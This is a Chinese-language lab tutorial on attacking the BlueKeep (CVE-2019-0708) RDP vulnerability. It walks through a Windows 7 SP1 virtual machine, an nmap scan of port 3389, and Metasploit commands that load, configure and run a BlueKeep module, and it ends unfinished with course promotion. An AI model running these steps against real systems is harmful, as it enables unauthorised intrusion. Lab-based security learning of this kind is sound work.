一、课前声明:
1、本分享仅做学习交流,请自觉遵守法律法规!
2、搜索:Kali 与编程,学习更多网络攻防干货!
3、Kali 与编程每天准时更新,敬请学习和关注!
二、资源装备
1.安装好 Kali Linux 的虚拟机一台
2.Win7 SP1受害者主机一个;
3.整装待发的小白一个。
三、战略安排
3.1 搭建受害者主机环境,如下图所示。
3.1.1 受害者主机基本信息介绍,如下图所示。
3.1.2 受害者主机下载教程,如下图所示。
网站:MSDN
步骤:打开网站、选择操作系统、选择Windows7、选择企业版SP1、复制链接、进入迅雷下载镜像。
3.1.3 开启受害者主机的远程登录服务即开启“3389”端口,如下图所示。
步骤:点击Windows、选择计算机、选择系统属性、选择允许远程连接该计算机、选择允许连接任意版本的远程桌面计算机连接、点击应用、点击确定。
3.2 配置攻击者主机跟受害者主机的网络环境,如下图所示。
步骤:两台主机全部选择桥接模式上网即可。
3.3 查看攻击者主机的IP地址网段,如下图所示。
命令:ifconfig
3.4 利用“nmap”扫描工具对攻击者主机所在网段进行主机查询(信息收集),如下图所示。
命令:nmap -p 3389 192.168.0.1/24
3.5 nmap扫描结果如下图所示。
3.6 利用Metasploit工具对受害者主机进行漏洞攻击,如下图所示。
3.6.1 打开Metasploit渗透框架,如下图所示。
命令:msfconsole
3.6.2 利用Metasploit渗透框架对Windows远程登录相关漏洞进行检索,如下图所示。
命令:search 0708
3.6.3 利用检索到的相关漏洞模块,如下图所示。
命令:use auxiliary/scanner/rdp/cve_2019_0708_bluekeep
3.6.4 查看该漏洞的相关参数配置,如下图所示。
命令:show options
3.6.5 设置相关参数,如下图所示。
命令:set RDP_CLIENT_IP 192.168.0.106
命令:set rhosts 192.168.0.106
3.7 运行漏洞模块对目标主机进行攻击,如下图所示。
命令:run
未完待续
辛苦原创,你的每一次评论点赞和关注,都是我们源源不断的创作动力哦!你也可搜索:Kali 与编程,学习更多 Kali Linux 渗透与白帽编程技巧呢!
点我学习完整视频渗透课,预计更新1000节